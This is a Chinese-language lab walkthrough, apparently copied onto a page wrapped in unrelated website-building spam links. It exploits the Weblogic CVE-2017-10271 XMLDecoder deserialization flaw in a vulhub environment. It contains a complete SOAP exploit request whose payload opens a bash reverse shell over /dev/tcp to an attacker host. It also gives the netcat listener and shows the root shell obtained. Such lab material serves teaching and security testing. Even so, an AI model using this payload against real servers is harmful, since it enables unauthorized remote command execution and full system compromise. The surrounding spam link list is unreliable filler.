当前位置: 首页 > news >正文

建设环评备案登记网站短视频运营方案策划书

建设环评备案登记网站,短视频运营方案策划书,龙海网站定制,网站网站制作多少钱漏洞成因 Weblogic的WLS Security组件对外提供 webservice服务 其中使用了XMLDecoder来 解析用户传入的XML数据 在解析的过程中出现 反序列化漏洞 ,导致可执行任意命令 原理:https://xz.aliyun.com/t/10172 靶场部署 1.进入靶场目录 cd /vulhub-maste…

漏洞成因

Weblogic的WLS Security组件对外提供 webservice服务

其中使用了XMLDecoder来 解析用户传入的XML数据

在解析的过程中出现 反序列化漏洞 ,导致可执行任意命令
原理:https://xz.aliyun.com/t/10172

靶场部署

1.进入靶场目录

cd /vulhub-master/weblogic/CVE-2017-10271

2.开启靶场【报错重启docker服务】

[root@localhost CVE-2017-10271]# docker-compose up -d
 
3.查看靶场端口

[root@localhost CVE-2017-10271]# docker ps

 4.访问靶场

192.168.10.5:7001

漏洞利用

1.漏洞发生页

192.168.10.5:7001/wls-wsat/CoordinatorPortType

2.配置poc

192.168.10.5 改成你的CentOS IP
192.168.10.128 改成你的Kali IP
8888 改成你的Kali监听端口

==========从以下内容开始复制==========
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.10.5:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 640

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/192.168.10.128/8888 0&gt;&amp;1</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

3.kali监听 8888 端口

nc -lvp 8888

4.bp发送poc请求包

修改右上角 Target

 

 粘贴并发送

5.连接建立成功

 

┌──(root㉿kali)-[~]
└─# nc -lvp 8888
listening on [any] 8888 ...
192.168.10.5: inverse host lookup failed: Unknown host
connect to [192.168.10.128] from (UNKNOWN) [192.168.10.5] 45432
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@af29889df405:~/Oracle/Middleware/user_projects/domains/base_domain# 

http://www.yayakq.cn/news/140921/

相关文章:

  • wordpress 同步 博客seo搜索优化试卷
  • 做外贸单网上都做的那些网站网站开发如何运用form表单
  • 做网站有啥软件网页html教程
  • 那些网站可以做自媒体平面设计app推荐
  • 蓝色大气企业网站模板微信外卖小程序加盟
  • 十大旅游电子商务网站非插件实现wordpress连接微博
  • 自己建服务类收费网站要多少钱镇江网站制作
  • 网站开发行业工作交接交接哪些刷外链网站
  • 烟台外贸网站建设长沙网站建设策划
  • 落地页模板网站如何微信小程序注册
  • 聊城网站建设工作室网站设计的文案
  • 赣州网站建设多少钱wordpress 截取文章内容
  • 网站制作步骤流程图永久免费wifi
  • 建设外贸网站价格wordpress api文档下载
  • 网站底部备案号网站注册了域名然后怎么做
  • flash制作网站top杭州建设企业网站的
  • 兰州网站建设招聘信息今天东莞封路
  • 专门做动漫的网站吗抚松网站建设
  • 九江城市投资建设有限公司网站舆情分析报告怎么写
  • 服装品牌网站怎么做建站之星官网建设
  • 免费的ai素材网站搜索引擎的网站推广方式
  • 网站建设关键词布局长春搜索排名提升
  • 规范网站维护 建设 管理国家示范校建设网站
  • 网站建设销售业绩任务国外网站为什么不用备案
  • 阿里巴巴官网招聘网站dedecms 安防监控行业网站模板
  • 深圳响应式网站建设德州万企互联网站制作
  • 怎么用织梦做购物网站百度地图电脑版网页
  • 苏州瑞熙网站建设wordpress发多少文章卡
  • 做图赚钱的网站有哪些网络搭建及应用技能大赛 试题与答案
  • 让人做网站 需要准备什么软件永久免费网站建设大概多少钱